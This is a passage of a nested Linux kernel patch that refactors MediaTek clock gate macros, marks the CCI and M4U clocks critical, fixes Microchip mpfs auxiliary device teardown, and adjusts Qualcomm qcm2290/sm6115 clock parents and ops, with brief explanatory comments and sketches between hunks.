++ *               AngeloGioacchino Del Regno <angelogioacchino.delregno@collabora.com>
+  */
+ 
+ #include <linux/clk.h>
+@@ -390,7 +392,7 @@ static const struct mtk_composite top_muxes[] __initconst = {
+ 	MUX_GATE(CLK_TOP_GCPU_SEL, "gcpu_sel", gcpu_parents, 0x0164, 24, 3, 31),
+ 	/* CLK_CFG_9 */
+ 	MUX_GATE(CLK_TOP_DPI1_SEL, "dpi1_sel", dpi1_parents, 0x0168, 0, 2, 7),
+-	MUX_GATE(CLK_TOP_CCI_SEL, "cci_sel", cci_parents, 0x0168, 8, 3, 15),
++	MUX_GATE_FLAGS(CLK_TOP_CCI_SEL, "cci_sel", cci_parents, 0x0168, 8, 3, 15, CLK_IS_CRITICAL),
+ 	MUX_GATE(CLK_TOP_APLL_SEL, "apll_sel", apll_parents, 0x0168, 16, 3, 23),
+ 	MUX_GATE(CLK_TOP_HDMIPLL_SEL, "hdmipll_sel", hdmipll_parents, 0x0168, 24, 2, 31),
+ };
+@@ -401,14 +403,12 @@ static const struct mtk_gate_regs infra_cg_regs = {
+ 	.sta_ofs = 0x0048,
+ };
+ 
+-#define GATE_ICG(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &infra_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_ICG(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &infra_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_ICG_AO(_id, _name, _parent, _shift)	\
++	GATE_MTK_FLAGS(_id, _name, _parent, &infra_cg_regs, _shift,	\
++		       &mtk_clk_gate_ops_setclr, CLK_IS_CRITICAL)
+ 
+ static const struct mtk_gate infra_clks[] __initconst = {
+ 	GATE_ICG(CLK_INFRA_PMIC_WRAP, "pmic_wrap_ck", "axi_sel", 23),
+@@ -417,7 +417,7 @@ static const struct mtk_gate infra_clks[] __initconst = {
+ 	GATE_ICG(CLK_INFRA_CCIF0_AP_CTRL, "ccif0_ap_ctrl", "axi_sel", 20),
+ 	GATE_ICG(CLK_INFRA_KP, "kp_ck", "axi_sel", 16),
+ 	GATE_ICG(CLK_INFRA_CPUM, "cpum_ck", "cpum_tck_in", 15),
+-	GATE_ICG(CLK_INFRA_M4U, "m4u_ck", "mem_sel", 8),
++	GATE_ICG_AO(CLK_INFRA_M4U, "m4u_ck", "mem_sel", 8),
+ 	GATE_ICG(CLK_INFRA_MFGAXI, "mfgaxi_ck", "axi_sel", 7),
+ 	GATE_ICG(CLK_INFRA_DEVAPC, "devapc_ck", "axi_sel", 6),
+ 	GATE_ICG(CLK_INFRA_AUDIO, "audio_ck", "aud_intbus_sel", 5),
+@@ -438,23 +438,11 @@ static const struct mtk_gate_regs peri1_cg_regs = {
+ 	.sta_ofs = 0x001c,
+ };
+ 
+-#define GATE_PERI0(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &peri0_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_PERI0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &peri0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_PERI1(_id, _name, _parent, _shift) {	\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &peri1_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_PERI1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &peri1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate peri_gates[] __initconst = {
+ 	/* PERI0 */
+@@ -551,8 +539,6 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+ 			&mt8135_clk_lock, clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_TOP_CCI_SEL]->clk);
+-
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		pr_err("%s(): could not register clock provider: %d\n",
+@@ -570,8 +556,6 @@ static void __init mtk_infrasys_init(struct device_node *node)
+ 	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+ 						clk_data);
+ 
+-	clk_prepare_enable(clk_data->hws[CLK_INFRA_M4U]->clk);
+-
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		pr_err("%s(): could not register clock provider: %d\n",
+diff --git a/drivers/clk/mediatek/clk-mt8167-aud.c b/drivers/clk/mediatek/clk-mt8167-aud.c
+index ce1ae8d243c33..b5ac196cd9454 100644
+--- a/drivers/clk/mediatek/clk-mt8167-aud.c
++++ b/drivers/clk/mediatek/clk-mt8167-aud.c
+@@ -23,14 +23,9 @@ static const struct mtk_gate_regs aud_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,			\
+-		.name = _name,			\
+-		.parent_name = _parent,		\
+-		.regs = &aud_cg_regs,		\
+-		.shift = _shift,		\
+-		.ops = &mtk_clk_gate_ops_no_setclr,		\
+-	}
++#define GATE_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
++
+ 
+ static const struct mtk_gate aud_clks[] __initconst = {
+ 	GATE_AUD(CLK_AUD_AFE, "aud_afe", "clk26m_ck", 2),
+diff --git a/drivers/clk/mediatek/clk-mt8167-img.c b/drivers/clk/mediatek/clk-mt8167-img.c
+index e359e563d2b79..4e7c0772b4f99 100644
+--- a/drivers/clk/mediatek/clk-mt8167-img.c
++++ b/drivers/clk/mediatek/clk-mt8167-img.c
+@@ -23,14 +23,8 @@ static const struct mtk_gate_regs img_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_IMG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &img_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_IMG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &img_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate img_clks[] __initconst = {
+ 	GATE_IMG(CLK_IMG_LARB1_SMI, "img_larb1_smi", "smi_mm", 0),
+diff --git a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+index 4fd82fe87d6e5..192714498b2ec 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
++++ b/drivers/clk/mediatek/clk-mt8167-mfgcfg.c
+@@ -23,14 +23,8 @@ static const struct mtk_gate_regs mfg_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_MFG(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mfg_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MFG(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &mfg_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mfg_clks[] __initconst = {
+ 	GATE_MFG(CLK_MFG_BAXI, "mfg_baxi", "ahb_infra_sel", 0),
+diff --git a/drivers/clk/mediatek/clk-mt8167-mm.c b/drivers/clk/mediatek/clk-mt8167-mm.c
+index 73910060577f6..a94961b7b8cc6 100644
+--- a/drivers/clk/mediatek/clk-mt8167-mm.c
++++ b/drivers/clk/mediatek/clk-mt8167-mm.c
+@@ -29,23 +29,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {		\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &mm1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt8167-vdec.c b/drivers/clk/mediatek/clk-mt8167-vdec.c
+index ee4fffb6859da..38f0ba357d599 100644
+--- a/drivers/clk/mediatek/clk-mt8167-vdec.c
++++ b/drivers/clk/mediatek/clk-mt8167-vdec.c
+@@ -29,23 +29,11 @@ static const struct mtk_gate_regs vdec1_cg_regs = {
+ 	.sta_ofs = 0x8,
+ };
+ 
+-#define GATE_VDEC0_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec0_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC0_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &vdec0_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_VDEC1_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &vdec1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_VDEC1_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &vdec1_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+ static const struct mtk_gate vdec_clks[] __initconst = {
+ 	/* VDEC0 */
+diff --git a/drivers/clk/mediatek/clk-mt8173-mm.c b/drivers/clk/mediatek/clk-mt8173-mm.c
+index 8abf42c2030c6..5826eabdc9c77 100644
+--- a/drivers/clk/mediatek/clk-mt8173-mm.c
++++ b/drivers/clk/mediatek/clk-mt8173-mm.c
+@@ -25,23 +25,11 @@ static const struct mtk_gate_regs mm1_cg_regs = {
+ 	.sta_ofs = 0x0110,
+ };
+ 
+-#define GATE_MM0(_id, _name, _parent, _shift) {			\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &mm0_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
+-
+-#define GATE_MM1(_id, _name, _parent, _shift) {			\
+-		.id = _id,					\
+-		.name = _name,					\
+-		.parent_name = _parent,				\
+-		.regs = &mm1_cg_regs,				\
+-		.shift = _shift,				\
+-		.ops = &mtk_clk_gate_ops_setclr,		\
+-	}
++#define GATE_MM0(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm0_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
++
++#define GATE_MM1(_id, _name, _parent, _shift)	\
++	GATE_MTK(_id, _name, _parent, &mm1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+ static const struct mtk_gate mt8173_mm_clks[] = {
+ 	/* MM0 */
+diff --git a/drivers/clk/mediatek/clk-mt8516-aud.c b/drivers/clk/mediatek/clk-mt8516-aud.c
+index 90f48068a8de7..a3dafc719799c 100644
+--- a/drivers/clk/mediatek/clk-mt8516-aud.c
++++ b/drivers/clk/mediatek/clk-mt8516-aud.c
+@@ -22,14 +22,8 @@ static const struct mtk_gate_regs aud_cg_regs = {
+ 	.sta_ofs = 0x0,
+ };
+ 
+-#define GATE_AUD(_id, _name, _parent, _shift) {	\
+-		.id = _id,			\
+-		.name = _name,			\
+-		.parent_name = _parent,		\
+-		.regs = &aud_cg_regs,		\
+-		.shift = _shift,		\
+-		.ops = &mtk_clk_gate_ops_no_setclr,		\
+-	}
++#define GATE_AUD(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &aud_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate aud_clks[] __initconst = {
+ 	GATE_AUD(CLK_AUD_AFE, "aud_afe", "clk26m_ck", 2),
+diff --git a/drivers/clk/mediatek/clk-mt8516.c b/drivers/clk/mediatek/clk-mt8516.c
+index b96db88893e23..056953d594c66 100644
+--- a/drivers/clk/mediatek/clk-mt8516.c
++++ b/drivers/clk/mediatek/clk-mt8516.c
+@@ -525,59 +525,23 @@ static const struct mtk_gate_regs top5_cg_regs = {
+ 	.sta_ofs = 0x44,
+ };
+ 
+-#define GATE_TOP1(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top1_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP1(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top1_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP2(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP2(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP2_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top2_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_TOP2_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top2_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_TOP3(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top3_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr,	\
+-	}
++#define GATE_TOP3(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top3_cg_regs, _shift, &mtk_clk_gate_ops_setclr)
+ 
+-#define GATE_TOP4_I(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top4_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_setclr_inv,	\
+-	}
++#define GATE_TOP4_I(_id, _name, _parent, _shift)			\
++	GATE_MTK(_id, _name, _parent, &top4_cg_regs, _shift, &mtk_clk_gate_ops_setclr_inv)
+ 
+-#define GATE_TOP5(_id, _name, _parent, _shift) {	\
+-		.id = _id,				\
+-		.name = _name,				\
+-		.parent_name = _parent,			\
+-		.regs = &top5_cg_regs,			\
+-		.shift = _shift,			\
+-		.ops = &mtk_clk_gate_ops_no_setclr,	\
+-	}
++#define GATE_TOP5(_id, _name, _parent, _shift)				\
++	GATE_MTK(_id, _name, _parent, &top5_cg_regs, _shift, &mtk_clk_gate_ops_no_setclr)
+ 
+ static const struct mtk_gate top_clks[] __initconst = {
+ 	/* TOP1 */
+diff --git a/drivers/clk/microchip/clk-mpfs.c b/drivers/clk/microchip/clk-mpfs.c
+index 4f0a19db7ed74..cc5d7dee59f06 100644
+--- a/drivers/clk/microchip/clk-mpfs.c
++++ b/drivers/clk/microchip/clk-mpfs.c
+@@ -374,14 +374,13 @@ static void mpfs_reset_unregister_adev(void *_adev)
+ 	struct auxiliary_device *adev = _adev;
+ 
+ 	auxiliary_device_delete(adev);
++	auxiliary_device_uninit(adev);
+ }
+ 
+ static void mpfs_reset_adev_release(struct device *dev)
+ {
+ 	struct auxiliary_device *adev = to_auxiliary_dev(dev);
+ 
+-	auxiliary_device_uninit(adev);
+-
+ 	kfree(adev);
+ }
+ 
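
The clk-mpfs hunk restores the canonical auxiliary bus teardown ordering: auxiliary_device_uninit() drops the reference taken by auxiliary_device_init(), so it belongs next to auxiliary_device_delete() in the owner's unregister path, not in the .release callback, which only runs once that last reference is gone. A minimal sketch of the intended pairing (function names hypothetical):

	static void my_adev_release(struct device *dev)
	{
		kfree(to_auxiliary_dev(dev));	/* last reference dropped */
	}

	static void my_adev_unregister(void *data)
	{
		struct auxiliary_device *adev = data;

		auxiliary_device_delete(adev);	/* unhook from the bus */
		auxiliary_device_uninit(adev);	/* put the init reference */
	}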
+diff --git a/drivers/clk/qcom/dispcc-qcm2290.c b/drivers/clk/qcom/dispcc-qcm2290.c
+index 96b149365912a..24755dc841f9d 100644
+--- a/drivers/clk/qcom/dispcc-qcm2290.c
++++ b/drivers/clk/qcom/dispcc-qcm2290.c
+@@ -26,7 +26,6 @@ enum {
+ 	P_DISP_CC_PLL0_OUT_MAIN,
+ 	P_DSI0_PHY_PLL_OUT_BYTECLK,
+ 	P_DSI0_PHY_PLL_OUT_DSICLK,
+-	P_DSI1_PHY_PLL_OUT_DSICLK,
+ 	P_GPLL0_OUT_MAIN,
+ 	P_SLEEP_CLK,
+ };
+@@ -71,7 +70,6 @@ static const struct parent_map disp_cc_parent_map_0[] = {
+ static const struct clk_parent_data disp_cc_parent_data_0[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .fw_name = "dsi0_phy_pll_out_byteclk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_1[] = {
+@@ -80,7 +78,6 @@ static const struct parent_map disp_cc_parent_map_1[] = {
+ 
+ static const struct clk_parent_data disp_cc_parent_data_1[] = {
+ 	{ .fw_name = "bi_tcxo" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_2[] = {
+@@ -91,7 +88,6 @@ static const struct parent_map disp_cc_parent_map_2[] = {
+ static const struct clk_parent_data disp_cc_parent_data_2[] = {
+ 	{ .fw_name = "bi_tcxo_ao" },
+ 	{ .fw_name = "gcc_disp_gpll0_div_clk_src" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_3[] = {
+@@ -104,20 +100,16 @@ static const struct clk_parent_data disp_cc_parent_data_3[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .hw = &disp_cc_pll0.clkr.hw },
+ 	{ .fw_name = "gcc_disp_gpll0_clk_src" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_4[] = {
+ 	{ P_BI_TCXO, 0 },
+ 	{ P_DSI0_PHY_PLL_OUT_DSICLK, 1 },
+-	{ P_DSI1_PHY_PLL_OUT_DSICLK, 2 },
+ };
+ 
+ static const struct clk_parent_data disp_cc_parent_data_4[] = {
+ 	{ .fw_name = "bi_tcxo" },
+ 	{ .fw_name = "dsi0_phy_pll_out_dsiclk" },
+-	{ .fw_name = "dsi1_phy_pll_out_dsiclk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static const struct parent_map disp_cc_parent_map_5[] = {
+@@ -126,7 +118,6 @@ static const struct parent_map disp_cc_parent_map_5[] = {
+ 
+ static const struct clk_parent_data disp_cc_parent_data_5[] = {
+ 	{ .fw_name = "sleep_clk" },
+-	{ .fw_name = "core_bi_pll_test_se" },
+ };
+ 
+ static struct clk_rcg2 disp_cc_mdss_byte0_clk_src = {
+diff --git a/drivers/clk/qcom/gcc-qcm2290.c b/drivers/clk/qcom/gcc-qcm2290.c
+index 7792b8f237047..096deff2ba257 100644
+--- a/drivers/clk/qcom/gcc-qcm2290.c
++++ b/drivers/clk/qcom/gcc-qcm2290.c
+@@ -1243,7 +1243,8 @@ static struct clk_rcg2 gcc_sdcc2_apps_clk_src = {
+ 		.name = "gcc_sdcc2_apps_clk_src",
+ 		.parent_data = gcc_parents_12,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_12),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_floor_ops,
++		.flags = CLK_OPS_PARENT_ENABLE,
+ 	},
+ };
+ 
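
Switching gcc_sdcc2_apps_clk_src to clk_rcg2_floor_ops makes the RCG round a requested rate down to the nearest supported frequency instead of up, which is the safe direction for SD/MMC, where overclocking the card is worse than undershooting. Illustrative only, assuming an ascending frequency table:

	static unsigned long pick_floor(const unsigned long *tbl, int n,
					unsigned long req)
	{
		unsigned long best = 0;
		int i;

		for (i = 0; i < n; i++)
			if (tbl[i] <= req && tbl[i] > best)
				best = tbl[i];

		return best ? best : tbl[0];	/* nothing fits: lowest rate */
	}

CLK_OPS_PARENT_ENABLE additionally forces the parents on around rate and reparent operations, which some RCGs need for the configuration update to latch.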
+diff --git a/drivers/clk/qcom/gcc-sm6115.c b/drivers/clk/qcom/gcc-sm6115.c
+index 565f9912039fe..631419caf695a 100644
+--- a/drivers/clk/qcom/gcc-sm6115.c
++++ b/drivers/clk/qcom/gcc-sm6115.c
+@@ -694,7 +694,7 @@ static struct clk_rcg2 gcc_camss_axi_clk_src = {
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -715,7 +715,7 @@ static struct clk_rcg2 gcc_camss_cci_clk_src = {
+ 		.parent_data = gcc_parents_9,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_9),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -738,7 +738,7 @@ static struct clk_rcg2 gcc_camss_csi0phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -753,7 +753,7 @@ static struct clk_rcg2 gcc_camss_csi1phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -768,7 +768,7 @@ static struct clk_rcg2 gcc_camss_csi2phytimer_clk_src = {
+ 		.parent_data = gcc_parents_4,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_4),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -790,7 +790,7 @@ static struct clk_rcg2 gcc_camss_mclk0_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -805,7 +805,7 @@ static struct clk_rcg2 gcc_camss_mclk1_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -820,7 +820,7 @@ static struct clk_rcg2 gcc_camss_mclk2_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -835,7 +835,7 @@ static struct clk_rcg2 gcc_camss_mclk3_clk_src = {
+ 		.parent_data = gcc_parents_3,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_3),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -857,7 +857,7 @@ static struct clk_rcg2 gcc_camss_ope_ahb_clk_src = {
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -881,7 +881,7 @@ static struct clk_rcg2 gcc_camss_ope_clk_src = {
+ 		.parent_data = gcc_parents_8,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_8),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -916,7 +916,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -941,7 +941,7 @@ static struct clk_rcg2 gcc_camss_tfe_0_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -956,7 +956,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -971,7 +971,7 @@ static struct clk_rcg2 gcc_camss_tfe_1_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -986,7 +986,7 @@ static struct clk_rcg2 gcc_camss_tfe_2_clk_src = {
+ 		.parent_data = gcc_parents_5,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_5),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1001,7 +1001,7 @@ static struct clk_rcg2 gcc_camss_tfe_2_csid_clk_src = {
+ 		.parent_data = gcc_parents_6,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_6),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1024,7 +1024,7 @@ static struct clk_rcg2 gcc_camss_tfe_cphy_rx_clk_src = {
+ 		.parent_data = gcc_parents_10,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_10),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1046,7 +1046,7 @@ static struct clk_rcg2 gcc_camss_top_ahb_clk_src = {
+ 		.parent_data = gcc_parents_7,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_7),
+ 		.flags = CLK_SET_RATE_PARENT | CLK_OPS_PARENT_ENABLE,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1116,7 +1116,7 @@ static struct clk_rcg2 gcc_pdm2_clk_src = {
+ 		.name = "gcc_pdm2_clk_src",
+ 		.parent_data = gcc_parents_0,
+ 		.num_parents = ARRAY_SIZE(gcc_parents_0),
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -1329,7 +1329,7 @@ static struct clk_rcg2 gcc_ufs_phy_axi_clk_src = {
+ 		.name = "gcc_ufs_phy_axi_clk_src",
+ 		.parent_data = gcc_parents_0,
